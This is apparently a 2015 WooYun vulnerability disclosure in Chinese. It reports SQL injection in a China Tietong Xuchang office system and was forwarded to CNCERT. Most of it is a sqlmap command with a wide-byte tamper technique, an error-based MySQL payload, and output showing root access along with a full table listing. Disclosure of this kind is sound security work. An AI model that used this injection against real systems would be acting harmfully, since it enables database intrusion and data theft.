当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149843

漏洞标题:运营商安全许昌铁通系统SQL注入/root权限/274个表信息

相关厂商:中国铁通

漏洞作者: 路人甲

提交时间:2015-10-27 15:54

修复时间:2015-12-14 17:44

公开时间:2015-12-14 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

详细说明:

sqlmap -u "**.**.**.**/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20" --dbms=mysql --tamper=between


1.jpg


2.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: FLOW_ID=11%bf'  AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
current database:    'td_oa'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: FLOW_ID=11%bf'  AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
current user:    'root@**.**.**.**'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: FLOW_ID=11%bf'  AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
available databases [7]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] TD_OA
[*] TD_OA_a
[*] TRAIN
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: FLOW_ID=11%bf'  AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
Database: TD_OA
[274 tables]
+----------------------------------+
| session                          |
| user                             |
| version                          |
| address                          |
| address_group                    |
| affair                           |
| app_log                          |
| attachment_edit                  |
| attend_config                    |
| attend_duty                      |
| attend_evection                  |
| attend_holiday                   |
| attend_leave                     |
| attend_manager                   |
| attend_out                       |
| attendance_overtime              |
| bbs_board                        |
| bbs_comment                      |
| book_info                        |
| book_manage                      |
| book_manager                     |
| book_type                        |
| bs_line                          |
| calendar                         |
| categories_type                  |
| censor_data                      |
| censor_module                    |
| censor_words                     |
| chatroom                         |
| contact                          |
| contract                         |
| contract_line                    |
| countdown                        |
| cp_asset_keep                    |
| cp_asset_reflect                 |
| cp_asset_type                    |
| cp_assetcfg                      |
| cp_cptl_info                     |
| cp_dpct_sub                      |
| cp_prcs_prop                     |
| crm_account                      |
| crm_account_care                 |
| crm_account_contact              |
| crm_action                       |
| crm_complain                     |
| crm_contract                     |
| crm_customer_service             |
| crm_depository                   |
| crm_marketing                    |
| crm_opportunity                  |
| crm_opportunity_products_list    |
| crm_order                        |
| crm_order_products_list          |
| crm_procurement_payment          |
| crm_product                      |
| crm_product_type                 |
| crm_purchase_order               |
| crm_purchase_order_products_list |
| crm_quotation                    |
| crm_quotation_products_list      |
| crm_salepay                      |
| crm_solutions                    |
| crm_stockout                     |
| crm_stockout_products_list       |
| crm_storage                      |
| crm_storage_products_list        |
| crm_supplier                     |
| crm_supplier_contact             |
| crm_sys_code                     |
| crm_sys_code_type                |
| crm_sys_op_priv                  |
| crm_sys_uv                       |
| crm_sys_uv_field                 |
| customer                         |
| data_src                         |
| department                       |
| dept_map                         |
| diary                            |
| diary_comment                    |
| diary_comment_reply              |
| doc_keywords                     |
| doc_print_log                    |
| doc_recv_data                    |
| doc_recv_prcs                    |
| doc_recv_priv                    |
| doc_send_data                    |
| doc_send_prcs                    |
| doc_type                         |
| efax_account                     |
| efax_receive_box                 |
| efax_send_box                    |
| email                            |
| email_body                       |
| email_box                        |
| email_name                       |
| exam_data                        |
| exam_flow                        |
| exam_paper                       |
| exam_quiz                        |
| exam_quiz_set                    |
| ext_user                         |
| field_date                       |
| fieldsetting                     |
| file_content                     |
| file_sort                        |
| flow_data_28                     |
| flow_form_type                   |
| flow_hook                        |
| flow_print_tpl                   |
| flow_process                     |
| flow_query_tpl                   |
| flow_report                      |
| flow_report_priv                 |
| flow_rule                        |
| flow_run                         |
| flow_run_data                    |
| flow_run_feedback                |
| flow_run_hook                    |
| flow_run_log                     |
| flow_run_prcs                    |
| flow_sort                        |
| flow_timer                       |
| flow_type                        |
| form_sort                        |
| gwiki_cate                       |
| gwiki_fav                        |
| gwiki_log                        |
| gwiki_priv                       |
| gwiki_tag                        |
| gwiki_template                   |
| gwiki_term                       |
| gwiki_term_final                 |
| gwiki_term_temp                  |
| hr_care_task                     |
| hr_code                          |
| hr_insurance_default             |
| hr_insurance_manage              |
| hr_insurance_para                |
| hr_manager                       |
| hr_recruit_filter                |
| hr_recruit_plan                  |
| hr_recruit_pool                  |
| hr_recruit_recruitment           |
| hr_recruit_requirements          |
| hr_sal_data                      |
| hr_staff_care                    |
| hr_staff_contract                |
| hr_staff_incentive               |
| hr_staff_info                    |
| hr_staff_labor_skills            |
| hr_staff_learn_experience        |
| hr_staff_leave                   |
| hr_staff_license                 |
| hr_staff_reinstatement           |
| hr_staff_relatives               |
| hr_staff_title_evaluation        |
| hr_staff_transfer                |
| hr_staff_work_experience         |
| hr_training_examine              |
| hr_training_plan                 |
| hr_training_record               |
| hr_wage_manage                   |
| hr_welfare_manage                |
| hrms                             |
| icqcontact_tb                    |
| icqmsgs_tb                       |
| icqservermsg_tb                  |
| im_group                         |
| im_message_cache                 |
| im_offline_file                  |
| interface                        |
| ip_rule                          |
| linkman                          |
| meeting                          |
| meeting_comment                  |
| meeting_equipment                |
| meeting_room                     |
| module_priv                      |
| mytable                          |
| netchat                          |
| netdisk                          |
| netmeeting                       |
| news                             |
| news_comment                     |
| notes                            |
| notify                           |
| oa_cyclesource_used              |
| oa_source                        |
| oa_source_used                   |
| oc_log                           |
| office_depository                |
| office_products                  |
| office_task                      |
| office_transhistory              |
| office_type                      |
| order_line                       |
| picture                          |
| plan_type                        |
| portal                           |
| product                          |
| proj_bug                         |
| proj_comment                     |
| proj_cost                        |
| proj_file                        |
| proj_file_log                    |
| proj_file_sort                   |
| proj_forum                       |
| proj_priv                        |
| proj_project                     |
| proj_task                        |
| proj_task_log                    |
| provider                         |
| provider_linkman                 |
| rms_file                         |
| rms_lend                         |
| rms_roll                         |
| rms_roll_room                    |
| rsa_keypair                      |
| sal_data                         |
| sal_flow                         |
| sal_item                         |
| sale_history                     |
| sale_manager                     |
| score_date                       |
| score_flow                       |
| score_group                      |
| score_item                       |
| seal                             |
| seal_keylic                      |
| seal_log                         |
| secure_key                       |
| service                          |
| sms                              |
| sms2                             |
| sms2_priv                        |
| sms3                             |
| sms_body                         |
| supply_history                   |
| supply_order                     |
| sys_code                         |
| sys_function                     |
| sys_log                          |
| sys_menu                         |
| sys_para                         |
| task                             |
| unit                             |
| url                              |
| user_group                       |
| user_map                         |
| user_online                      |
| user_priv                        |
| vehicle                          |
| vehicle_maintenance              |
| vehicle_oil_use                  |
| vehicle_operator                 |
| vehicle_usage                    |
| vi_flow_run                      |
| vi_user                          |
| vote_data                        |
| vote_item                        |
| vote_title                       |
| webmail                          |
| webmail_body                     |
| wiki_ask                         |
| wiki_ask_answer                  |
| wiki_comment                     |
| wiki_info                        |
| winexe                           |
| word_model                       |
| work_detail                      |
| work_person                      |
| work_plan                        |
| zbap_paiban                      |
| zl_file                          |
+----------------------------------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无